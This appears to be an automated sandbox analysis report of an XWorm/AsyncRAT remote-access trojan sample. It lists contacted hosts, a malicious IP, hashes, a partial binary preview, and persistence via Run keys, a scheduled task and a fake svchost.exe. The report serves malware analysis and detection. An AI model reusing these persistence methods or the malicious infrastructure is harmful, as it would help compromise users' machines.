Name	Malicious	Antivirus Detection	Reputation
https://pastebin.com/raw/vJmE27fr	false		high
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2220656661.000002336FF53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2303817194.00000215AFC13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2437806103.000002AD6C363000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.coJ	powershell.exe, 00000005.00000002.2318854138.00000215B83B3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micro	a9YMw44iQq.exe, 00000000.00000002.3410060058.000000001BD80000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000B.00000002.2493300530.000001B581639000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.coK	powershell.exe, 0000000B.00000002.2623275367.000001B5FF774000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.miB	powershell.exe, 0000000B.00000002.2623275367.000001B5FF774000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.2197736957.0000023360108000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253293578.000002159FDCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350862224.000002AD5C519000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2493300530.000001B581639000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000B.00000002.2493300530.000001B581639000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ion=v4.5	powershell.exe, 00000008.00000002.2458910527.000002AD747D5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.2197736957.0000023360108000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253293578.000002159FDCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350862224.000002AD5C519000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2493300530.000001B581639000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.micom/pkiops/Docs/ry.htm0	powershell.exe, 00000002.00000002.2226616420.0000023378537000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000008.00000002.2437806103.000002AD6C363000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2220656661.000002336FF53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2303817194.00000215AFC13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2437806103.000002AD6C363000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.co	powershell.exe, 00000002.00000002.2226475493.0000023378450000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000008.00000002.2437806103.000002AD6C363000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000008.00000002.2437806103.000002AD6C363000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsx	powershell.exe, 00000005.00000002.2318854138.00000215B83B3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.2197736957.000002335FEE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253293578.000002159FBA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350862224.000002AD5C2F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2493300530.000001B581411000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	a9YMw44iQq.exe, 00000000.00000002.3369216430.0000000002401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2197736957.000002335FEE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253293578.000002159FBA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350862224.000002AD5C2F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2493300530.000001B581411000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000B.00000002.2493300530.000001B581639000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
172.67.19.24	pastebin.com	United States	13335	CLOUDFLARENETUS	false
5.166.171.54	unknown	Russian Federation	12768	ER-TELECOM-ASRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1570400
Start date and time:	2024-12-06 22:50:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	a9YMw44iQq.exe renamed because original name is a hash value
Original Sample Name:	4854a1611616f474d7241dc0268f913f92887a383a81e2dba1186c358cf93f22.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@21/21@2/3
EGA Information:	Successful, ratio: 10%
HCA Information:	Successful, ratio: 99% Number of executed functions: 95 Number of non-executed functions: 6
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 1088 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2308 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2444 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4044 because it is empty
Execution Graph export aborted for target svchost.exe, PID 1016 because it is empty
Execution Graph export aborted for target svchost.exe, PID 2716 because it is empty
Execution Graph export aborted for target svchost.exe, PID 4148 because it is empty
Execution Graph export aborted for target svchost.exe, PID 5832 because it is empty
Execution Graph export aborted for target svchost.exe, PID 6400 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: a9YMw44iQq.exe

Simulations

Behavior and APIs

Time	Type	Description
16:51:04	API Interceptor	53x Sleep call for process: powershell.exe modified
16:51:52	API Interceptor	317545x Sleep call for process: a9YMw44iQq.exe modified
22:51:53	Task Scheduler	Run new task: svchost path: C:\ProgramData\svchost.exe
22:51:54	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\ProgramData\svchost.exe
22:52:02	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\ProgramData\svchost.exe
22:52:10	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	ozgpPwVAu1.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	PG4w1WB9dE.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	a4BE6gJooT.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	grK0Oh8p4Z.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	CPym6H29BR.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	cJ6xbAA5Rn.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/
	5eAjHgPxj2.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	ip-api.com/json/
	e2mzbWePHw.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	ip-api.com/json/
	Transferencia de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	file.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	ip-api.com/line/?fields=hosting
172.67.19.24	sys_upd.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_menu..ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm2.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_phshop..ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	VvPrGsGGWH.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	pastebin.com/raw/sA04Mwk2
	HQsitBLlOv.dll	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	xK44OOt7vD.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	steamcodegenerator.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_hiddenz.ps1	Get hash	malicious	AsyncRAT, XWorm	Browse	pastebin.com/raw/sA04Mwk2
	BeginSync lnk.lnk	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pastebin.com	nlGOh9K5X5.exe	Get hash	malicious	Xmrig	Browse	172.67.19.24
	cJ6xbAA5Rn.exe	Get hash	malicious	Unknown	Browse	172.67.19.24
	vortex.ps1	Get hash	malicious	AsyncRAT, PureLog Stealer	Browse	104.20.3.235
	MicrosoftScript.ps1	Get hash	malicious	AsyncRAT, PureLog Stealer	Browse	172.67.19.24
	msedge.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	104.20.3.235
	Full_Setup_v24.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.19.24
	asegurar.vbs	Get hash	malicious	Unknown	Browse	104.20.4.235
	crypted_LummaC2.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.19.24
	crypted_LummaC2 (3).exe	Get hash	malicious	LummaC Stealer	Browse	172.67.19.24
	'Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.20.4.235
ip-api.com	ozgpPwVAu1.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	PG4w1WB9dE.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	a4BE6gJooT.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	grK0Oh8p4Z.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	CPym6H29BR.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	cJ6xbAA5Rn.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	5eAjHgPxj2.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	208.95.112.1
	e2mzbWePHw.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	208.95.112.1
	Transferencia de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	file.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ER-TELECOM-ASRU	la.bot.arm7.elf	Get hash	malicious	Mirai	Browse	46.146.25.127
	sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	46.146.139.233
	sparc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	46.146.98.8
	yakuza.sparc.elf	Get hash	malicious	Unknown	Browse	5.166.189.202
	http://www.goo.su/c1Rnox/	Get hash	malicious	Unknown	Browse	81.19.89.17
	http://www.goo.su/fJu2F/	Get hash	malicious	Unknown	Browse	81.19.78.78
	https://lenta.ru/articles/2023/01/13/darkpr/	Get hash	malicious	HTMLPhisher	Browse	81.19.82.12
	http://www.goo.su/JpY9S/	Get hash	malicious	Unknown	Browse	81.19.78.76
	http://www.euroluxstore.com/	Get hash	malicious	Unknown	Browse	81.19.89.17
	botx.x86.elf	Get hash	malicious	Mirai	Browse	46.146.187.176
CLOUDFLARENETUS	nlGOh9K5X5.exe	Get hash	malicious	Xmrig	Browse	172.67.19.24
	Fw Your flight has been cancelled.eml	Get hash	malicious	Unknown	Browse	104.17.247.203
	https://login.officeteam.didgim.com/factpath/resources/patch/047620476204762098/?tpj=PlKRhyZP6wwT3cO_YX5-vBD5GuXYTvvU?SehS24G3uU3qw64njI8IZH7gQJoi5rbp7C2uDZbPGel89LOXSbLkxzcBkcMiAnricyOgDlVZzgK16brTMbOGyuYoLIN4U0HH714J	Get hash	malicious	ReCaptcha Phish	Browse	104.16.124.96
	Distribution Agreement -21_12_48-December 6, 2024-be1f31b3a4b24beb88d27adfd723203e.pdf	Get hash	malicious	Unknown	Browse	1.1.1.1
	Doc_21-04-53.js	Get hash	malicious	Matanbuchus	Browse	104.21.40.3
	https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2dd	Get hash	malicious	Unknown	Browse	104.21.16.114
	Doc_21-04-53.js	Get hash	malicious	Matanbuchus	Browse	104.21.40.3
	https://wrx.dzpvwobr.ru/	Get hash	malicious	Unknown	Browse	172.67.211.61
	https://www.google.ca/url?q=1120091333775300779273902563687390256368&rct=11200913337753007792&sa=t&url=amp/s/elanpro.net/horeca/dispenc#YnJ1bml0YS5kdW5jYW5AcGFydG5lcnNtZ3UuY29t	Get hash	malicious	HTMLPhisher	Browse	104.26.9.44
	https://villageforddearborn-my.sharepoint.com/:b:/g/personal/robert_wheat_villageford_net/EaAilHqK5PhBneaYfVtjii0ByKmI10BU9zhQ73pqIHj-uQ?e=FnQ6KL	Get hash	malicious	Unknown	Browse	104.18.95.41
TUT-ASUS	ozgpPwVAu1.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	PG4w1WB9dE.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	a4BE6gJooT.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	grK0Oh8p4Z.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	CPym6H29BR.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	cJ6xbAA5Rn.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	5eAjHgPxj2.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	208.95.112.1
	e2mzbWePHw.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	208.95.112.1
	Transferencia de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	file.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	208.95.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	ozgpPwVAu1.exe	Get hash	malicious	XWorm	Browse	172.67.19.24
	https://www.google.ca/url?q=1120091333775300779273902563687390256368&rct=11200913337753007792&sa=t&url=amp/s/elanpro.net/horeca/dispenc#YnJ1bml0YS5kdW5jYW5AcGFydG5lcnNtZ3UuY29t	Get hash	malicious	HTMLPhisher	Browse	172.67.19.24
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.19.24
	BGM LAW GROUP - RFP 2024.pdf	Get hash	malicious	Unknown	Browse	172.67.19.24
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.67.19.24
	Shipping Documents 72908672134.exe	Get hash	malicious	AgentTesla	Browse	172.67.19.24
	https://app.droplet.io/form/K47rYN	Get hash	malicious	Unknown	Browse	172.67.19.24
	QUOTE_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	172.67.19.24
	QUOTE_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	172.67.19.24
	vUlh7stUHJ.exe	Get hash	malicious	XWorm	Browse	172.67.19.24

Process:	C:\Users\user\Desktop\a9YMw44iQq.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	82944
Entropy (8bit):	5.938591313720819
Encrypted:	false
SSDEEP:	1536:NfFb0NWmGRk7di8n/7IbDqS8a1gMGT6tVOUVprKsZ:NBrk7dHIbDMMJVOUVpdZ
MD5:	F068A2F351D11284FEE8D768A64F6C9C
SHA1:	6FCBA43B6B6024C8795D699F638444654714C276
SHA-256:	4854A1611616F474D7241DC0268F913F92887A383A81E2DBA1186C358CF93F22
SHA-512:	856C01CFBDE2B8A41564A77F07B5561D69679DA6A0AF8DA86D6DC869309D04CABAC0A06C37560456E8BF6DFA0F04E342B57F2AFBCB5DDBF4D0BBE06944387FF2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\svchost.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\svchost.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\svchost.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Rg.................:...........X... ...`....@.. ....................................@..................................W..O....`............................................................................... ............... ..H............text....8... ...:.................. ..`.rsrc........`.......<..............@..@.reloc...............B..............@..B.................W......H........n..........&.....................................................(.....r...p. ..z...(.....rC..p. .....s.........s.........s.........s..........r...p. .x!..rM..p. E/...r...p. `...r...p. .i...r\..p..((....r...p. ..?..r...p. }p...(,...-.(-...,.+.(....,.+.(+...,.+.(...,..(a..."(....+.&()...&+..+5so... .... .'..op...(,...~....-.(b...(T...~....oq...&.-..rv..p. .y4..r;..p. r.m..r...p. .O...r...p.r...p. .,>..rO..p. .T...r...p. ....r..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\Users\user\Desktop\a9YMw44iQq.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	35
Entropy (8bit):	3.7071562309216133
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsr4rn:EFYJKDoWrcn
MD5:	BFABEC865892A34F532FABF984F7E156
SHA1:	3C8292E49FEFD3DA96DBC289B36C4C710B0127E3
SHA-256:	8C8E36E0088165B6606F75DF86D53D3527FD36518C5AAB07425969B066FEEEC6
SHA-512:	CA042E157B8C0E728991567016DF2036D8E6E4311CC74E7DB8AB6335AC20C02BD8099F3248E82B8DB5C26A7C6B687D1D7A440EC77D55B3BAE42D3753DBD63129
Malicious:	false
Preview:	....### explorer ###..[WIN]r[WIN]r

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14dqgwaw.gpl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eoanqvpi.wz1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fouwf2xn.jap.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fthmke1i.p2d.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i424jzbq.gni.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_imcaemth.q5g.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbdwy3ph.15x.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lswjmuqh.3rx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mnftcd3q.yam.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
